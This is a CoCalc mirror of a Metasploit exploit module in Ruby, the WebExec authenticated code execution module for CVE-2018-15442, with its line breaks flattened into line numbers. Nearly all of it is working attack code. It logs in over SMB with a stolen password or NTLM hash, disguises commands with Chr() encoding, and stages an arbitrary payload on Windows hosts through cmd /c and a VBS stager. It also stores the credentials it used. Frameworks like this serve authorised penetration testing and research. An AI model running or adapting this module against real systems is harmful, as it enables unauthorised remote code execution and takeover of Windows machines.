CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/smb/webexec.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45# Windows XP systems that are not part of a domain default to treating all6# network logons as if they were Guest. This prevents SMB relay attacks from7# gaining administrative access to these systems. This setting can be found8# under:9#10# Local Security Settings >11# Local Policies >12# Security Options >13# Network Access: Sharing and security model for local accounts1415class MetasploitModule < Msf::Exploit::Remote16Rank = ManualRanking1718include Msf::Exploit::CmdStager19include Msf::Exploit::Remote::SMB::Client::WebExec20include Msf::Exploit::Powershell21include Msf::Exploit::EXE22include Msf::Exploit::WbemExec23include Msf::Auxiliary::Report2425def initialize(info = {})26super(update_info(info,27'Name' => 'WebExec Authenticated User Code Execution',28'Description' => %q{29This module uses a valid username and password of any level (or30password hash) to execute an arbitrary payload. This module is similar31to the "psexec" module, except allows any non-guest account by default.32},33'Author' =>34[35'Ron <[email protected]>',36],37'License' => MSF_LICENSE,38'Privileged' => true,39'DefaultOptions' =>40{41'WfsDelay' => 10,42'EXITFUNC' => 'thread'43},44'References' =>45[46['URL', 'https://webexec.org'],47[ 'CVE', '2018-15442' ],48],49'Payload' =>50{51'Space' => 3072,52'DisableNops' => true53},54'Platform' => 'win',55'Arch' => [ARCH_X86, ARCH_X64],56'Targets' =>57[58[ 'Automatic', { } ],59[ 'Native upload', { } ],60],61'DefaultTarget' => 0,62'DisclosureDate' => '2018-10-24'63))6465register_options(66[67# This has to be a full path, %ENV% variables are not expanded68OptString.new('TMPDIR', [ true, "The directory to stage our payload in", "c:\\Windows\\Temp\\" ])69])7071register_advanced_options(72[73OptBool.new('ALLOW_GUEST', [true, "Keep trying if only given guest access", false]),74OptInt.new('MAX_LINE_LENGTH', [true, "The length of lines when splitting up the payload", 1000]),75])76end7778# This is the callback for cmdstager, which breaks the full command into79# chunks and sends it our way. We have to do a bit of finangling to make it80# work correctly81def execute_command(command, opts)82# Replace the empty string, "", with a workaround - the first 0 characters of "A"83command = command.gsub('""', 'mid(Chr(65), 1, 0)')8485# Replace quoted strings with Chr(XX) versions, in a naive way86command = command.gsub(/"[^"]*"/) do |capture|87capture.gsub(/"/, "").chars.map do |c|88"Chr(#{c.ord})"89end.join('+')90end9192# Prepend "cmd /c" so we can use a redirect93command = "cmd /c " + command9495execute_single_command(command, opts)96end9798def exploit99print_status("Connecting to the server...")100connect101102print_status("Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...")103smb_login104105if not simple.client.auth_user and not datastore['ALLOW_GUEST']106print_line(" ")107print_error(108"FAILED! The remote host has only provided us with Guest privileges. " +109"Please make sure that the correct username and password have been provided. " +110"Windows XP systems that are not part of a domain will only provide Guest privileges " +111"to network logins by default."112)113print_line(" ")114disconnect115return116end117118begin119if datastore['SMBUser'].to_s.strip.length > 0120report_auth121end122123# Avoid implementing NTLMSSP on Windows XP124# http://seclists.org/metasploit/2009/q1/6125if smb_peer_os == "Windows 5.1"126connect(versions: [1])127smb_login128end129130wexec(true) do |opts|131opts[:flavor] = :vbs132opts[:linemax] = datastore['MAX_LINE_LENGTH']133opts[:temp] = datastore['TMPDIR']134opts[:delay] = 0.05135execute_cmdstager(opts)136end137handler138disconnect139end140141end142143def report_auth144service_data = {145address: ::Rex::Socket.getaddress(datastore['RHOST'],true),146port: datastore['RPORT'],147service_name: 'smb',148protocol: 'tcp',149workspace_id: myworkspace_id150}151152credential_data = {153origin_type: :service,154module_fullname: self.fullname,155private_data: datastore['SMBPass'],156username: datastore['SMBUser'].downcase157}158159if datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP'160credential_data.merge!({161realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,162realm_value: datastore['SMBDomain']163})164end165166if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/167credential_data.merge!({:private_type => :ntlm_hash})168else169credential_data.merge!({:private_type => :password})170end171172credential_data.merge!(service_data)173174credential_core = create_credential(credential_data)175176login_data = {177access_level: 'Admin',178core: credential_core,179last_attempted_at: DateTime.now,180status: Metasploit::Model::Login::Status::SUCCESSFUL181}182183login_data.merge!(service_data)184create_credential_login(login_data)185end186end187188189